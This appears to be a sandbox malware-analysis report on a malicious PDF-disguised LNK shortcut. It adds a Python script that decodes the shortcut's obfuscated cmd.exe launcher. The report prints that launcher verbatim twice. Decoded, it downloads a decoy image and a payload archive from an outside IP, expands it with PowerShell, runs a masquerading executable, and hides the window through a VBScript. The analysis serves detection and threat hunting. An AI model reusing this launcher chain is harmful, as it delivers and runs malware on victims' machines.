Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    10/11/2024, 22:06

General

  • Target

    transaction.pdf.lnk

  • Size

    3KB

  • MD5

    0a2f22c7a16adfe8fbfa67b77edc82b4

  • SHA1

    c2556809eee64ec4061a50d4ea2ee41d6781371f

  • SHA256

    d1dcb2be1a582a5bc503bac9b906f54a4fa7fd2d17b0fa5156b936c7f8acc7bb

  • SHA512

    002bb80565514e02834f182f029f5eb0593d22e915aeb6014cf650ef38b93f0a5b8849e7dd766b4099d96025c083b7a0e6790f815e7eec14a5ee2d44ad4dfeac

Score
5/10

Malware Config

Signatures

  • Drops file in System32 directory 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\transaction.pdf.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2372
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /v /c "set "JWU1=e"&&set "RnK2=n"&&set "nKM3=c"&&set "fHp4=r"&&set "uwq5=y"&&set "IIX6=p"&&set "Pfo7=t"&&set "Umz8=i"&&set "FwH9=o"&&set "Nix10=n"&&set "unu11=k"&&set "Mbr12=e"&&set "mNc13=y"&@echo off & (for %t in ("@!Mbr12!!nKM3!h!FwH9! !FwH9!ff" "!nKM3!u!fHp4!l -!FwH9! C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g h!Pfo7!!Pfo7!!IIX6!s://d!fHp4!!Umz8!v!Mbr12!.f!Umz8!l!Mbr12!!Umz8!!FwH9!.!nKM3!!Mbr12!!Nix10!!Pfo7!!Mbr12!!fHp4!/bas!Mbr12!1.j!IIX6!g" "C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g" "!nKM3!u!fHp4!l -L -!FwH9! C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6! h!Pfo7!!Pfo7!!IIX6!://170.75.168.151/VORHPBAB/aaa" "!IIX6!!FwH9!w!Mbr12!!fHp4!sh!Mbr12!ll -C!FwH9!mma!Nix10!d Ex!IIX6!a!Nix10!d-A!fHp4!!nKM3!h!Umz8!v!Mbr12! -Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6!' -D!Mbr12!s!Pfo7!!Umz8!!Nix10!a!Pfo7!!Umz8!!FwH9!!Nix10!Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp' -F!FwH9!!fHp4!!nKM3!!Mbr12!" "s!Pfo7!a!fHp4!!Pfo7! C:\Users\Admin\AppData\Local\Temp\A!IIX6!!IIX6!l!Umz8!!nKM3!a!Pfo7!!Umz8!!FwH9!!Nix10!F!fHp4!am!Mbr12!H!FwH9!s!Pfo7!.!Mbr12!x!Mbr12!") do echo %~t) > "C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7!" && !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7! ba!Pfo7!2.ba!Pfo7! & !Mbr12!!nKM3!h!FwH9! S!Mbr12!!Pfo7! !FwH9!bjSh!Mbr12!ll = C!fHp4!!Mbr12!a!Pfo7!!Mbr12!Obj!Mbr12!!nKM3!!Pfo7!("WS!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7!.Sh!Mbr12!ll") : !FwH9!bjSh!Mbr12!ll.Ru!Nix10! "!nKM3!md.!Mbr12!x!Mbr12! /c C:\Users\Admin\AppData\Local\Temp\ba!Pfo7!2.ba!Pfo7!", 0, False > "C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7!" & !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7! !fHp4!u!Nix10!_ba!Pfo7!.vbs & s!Pfo7!a!fHp4!!Pfo7! "" !nKM3!s!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7! //!Nix10!!FwH9!l!FwH9!g!FwH9! "C:\Users\Admin\AppData\Local\Temp\!fHp4!u!Nix10!_ba!Pfo7!.vbs""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2204
      • C:\Windows\System32\cscript.exe
        cscript //nologo "C:\Users\Admin\AppData\Local\Temp\run_bat.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2664
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\bat2.bat
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2780
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\base.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp' -Force
            5⤵
            • Drops file in System32 directory
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2964
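
Decoding the PID 2204 command line. The second cmd.exe is started with /v (delayed expansion): it first defines thirteen one-character variables with set "NAME=x" and then spells every command out of !NAME! references, so no plaintext command appears in the LNK itself. The script below is an added analysis helper, not part of the sample or of this report; its only input is the command line copied verbatim from the process tree above. It resolves the references the way cmd.exe does, then extracts the six lines the for loop echoes into a.txt (renamed to bat2.bat, the 448-byte file listed under Downloads). Decoded, bat2.bat is: @echo off; curl -o ...\Temp\test.jpg https://drive.fileio.center/base1.jpg (decoy image); open the image; curl -L -o ...\Temp\base.zip http://170.75.168.151/VORHPBAB/aaa; the powershell Expand-Archive command seen at PID 2964; start ...\Temp\ApplicationFrameHost.exe (the name of a legitimate Windows binary, here launched from a user-writable directory). The rest of the line echoes a one-line VBScript into b.txt, renames it run_bat.vbs and runs it with cscript //nologo; its objShell.Run "...", 0, False is what produces the hidden cmd.exe at PID 2780. No curl.exe process and no base.zip or ApplicationFrameHost.exe artifact appears in this report; curl.exe is not present on a stock Windows 7 image, so the download and payload stages did not execute in this run and the 5/10 score covers only the launcher chain.

```python
"""Resolve the cmd.exe /v (delayed expansion) variable-substitution obfuscation in the PID 2204 command line.

Added analysis helper; not part of the sample or of the sandbox report. The only input is the command
line recorded in the process tree, pasted verbatim.
"""
import re

# Command line of the second cmd.exe (PID 2204), copied from the report. Not constructed.
CMDLINE = r'''"C:\Windows\System32\cmd.exe" /v /c "set "JWU1=e"&&set "RnK2=n"&&set "nKM3=c"&&set "fHp4=r"&&set "uwq5=y"&&set "IIX6=p"&&set "Pfo7=t"&&set "Umz8=i"&&set "FwH9=o"&&set "Nix10=n"&&set "unu11=k"&&set "Mbr12=e"&&set "mNc13=y"&@echo off & (for %t in ("@!Mbr12!!nKM3!h!FwH9! !FwH9!ff" "!nKM3!u!fHp4!l -!FwH9! C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g h!Pfo7!!Pfo7!!IIX6!s://d!fHp4!!Umz8!v!Mbr12!.f!Umz8!l!Mbr12!!Umz8!!FwH9!.!nKM3!!Mbr12!!Nix10!!Pfo7!!Mbr12!!fHp4!/bas!Mbr12!1.j!IIX6!g" "C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g" "!nKM3!u!fHp4!l -L -!FwH9! C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6! h!Pfo7!!Pfo7!!IIX6!://170.75.168.151/VORHPBAB/aaa" "!IIX6!!FwH9!w!Mbr12!!fHp4!sh!Mbr12!ll -C!FwH9!mma!Nix10!d Ex!IIX6!a!Nix10!d-A!fHp4!!nKM3!h!Umz8!v!Mbr12! -Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6!' -D!Mbr12!s!Pfo7!!Umz8!!Nix10!a!Pfo7!!Umz8!!FwH9!!Nix10!Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp' -F!FwH9!!fHp4!!nKM3!!Mbr12!" "s!Pfo7!a!fHp4!!Pfo7! C:\Users\Admin\AppData\Local\Temp\A!IIX6!!IIX6!l!Umz8!!nKM3!a!Pfo7!!Umz8!!FwH9!!Nix10!F!fHp4!am!Mbr12!H!FwH9!s!Pfo7!.!Mbr12!x!Mbr12!") do echo %~t) > "C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7!" && !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7! ba!Pfo7!2.ba!Pfo7! & !Mbr12!!nKM3!h!FwH9! S!Mbr12!!Pfo7! !FwH9!bjSh!Mbr12!ll = C!fHp4!!Mbr12!a!Pfo7!!Mbr12!Obj!Mbr12!!nKM3!!Pfo7!("WS!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7!.Sh!Mbr12!ll") : !FwH9!bjSh!Mbr12!ll.Ru!Nix10! "!nKM3!md.!Mbr12!x!Mbr12! /c C:\Users\Admin\AppData\Local\Temp\ba!Pfo7!2.ba!Pfo7!", 0, False > "C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7!" & !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7! !fHp4!u!Nix10!_ba!Pfo7!.vbs & s!Pfo7!a!fHp4!!Pfo7! "" !nKM3!s!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7! //!Nix10!!FwH9!l!FwH9!g!FwH9! "C:\Users\Admin\AppData\Local\Temp\!fHp4!u!Nix10!_ba!Pfo7!.vbs""'''

# set "NAME=value" definitions: alphanumeric name, value runs to the closing quote.
SET_RE = re.compile(r'set "(\w+)=([^"]*)"')
# !NAME! references, which cmd.exe resolves at execution time when started with /v.
REF_RE = re.compile(r'!(\w+)!')


def parse_sets(cmdline: str) -> dict:
    """Collect every set "NAME=value" definition; a later definition overrides an earlier one, as in cmd."""
    return {name: value for name, value in SET_RE.findall(cmdline)}


def expand(text: str, variables: dict) -> str:
    """Substitute each !NAME!; an unknown name is left untouched so a missed definition stays visible."""
    return REF_RE.sub(lambda m: variables.get(m.group(1), m.group(0)), text)


def deobfuscate(cmdline: str) -> str:
    """Return the command line as cmd.exe executes it after delayed expansion."""
    return expand(cmdline, parse_sets(cmdline))


def batch_body(cmdline: str) -> list:
    """Return the lines the for loop echoes into a.txt (renamed to bat2.bat): the second-stage batch file."""
    plain = deobfuscate(cmdline)
    loop = re.search(r'for %t in \((.*?)\) do echo %~t', plain)
    return re.findall(r'"([^"]*)"', loop.group(1)) if loop else []


def obfuscation_indicators(cmdline: str) -> dict:
    """Cheap triage signals for this technique: /v plus many one-character set assignments and !NAME! references.

    Only the "/v" spelling is checked here; "/v:on" is a valid variant not covered.
    """
    sets = SET_RE.findall(cmdline)
    return {
        "delayed_expansion": " /v " in cmdline.lower(),
        "single_char_sets": sum(1 for _, value in sets if len(value) == 1),
        "references": len(REF_RE.findall(cmdline)),
    }


if __name__ == "__main__":
    print(obfuscation_indicators(CMDLINE))
    print("--- bat2.bat ---")
    for line in batch_body(CMDLINE):
        print(line)
    print("--- full command line ---")
    print(deobfuscate(CMDLINE))
```

The same two regexes work on any cmd.exe /v launcher of this family; only CMDLINE needs replacing. The thirteen variable values read e,n,c,r,y,p,t,i,o,n,k,e,y in definition order, which is a convenient string to pivot on when hunting for related samples.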

Network

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\bat2.bat

          Filesize

          448B

          MD5

          8fa76d0dea5819256a19064f1639b35c

          SHA1

          8dd913107ed46e6df0babd1996c67a65909592b9

          SHA256

          b54a02a81debd9191d15efa77bb915b298f4e7ba1e12638e8fa7280dc8e5b16a

          SHA512

          468fb2dbf989657d9f0d1e39bb0a6213b5021b255c415a53bded8bc240eb49ae261e11c9904b481476dd9cc5f86e69338afd4fd953b46fb3bd294655d3533b48

        • C:\Users\Admin\AppData\Local\Temp\run_bat.vbs

          Filesize

          129B

          MD5

          88c7a65cabaeae2e10cbc7bd5608b28b

          SHA1

          d6ee96710a99d0f65a867c6082148ae7a4981227

          SHA256

          250bba449b1002c473327e0f2450753fe07f42ad4ffac8a8dc2f367cb416b543

          SHA512

          b78af497df0dc713822859cb72c58415c0974c43bdd2bad4d4ebdcfc307bbf1f4178452bb7816e28b1a5b3b3f5152a0fbafcd6dc4568d99e9e3fc20ff28a3340

        • memory/2964-46-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

          Filesize

          2.9MB

        • memory/2964-47-0x0000000002760000-0x0000000002768000-memory.dmp

          Filesize

          32KB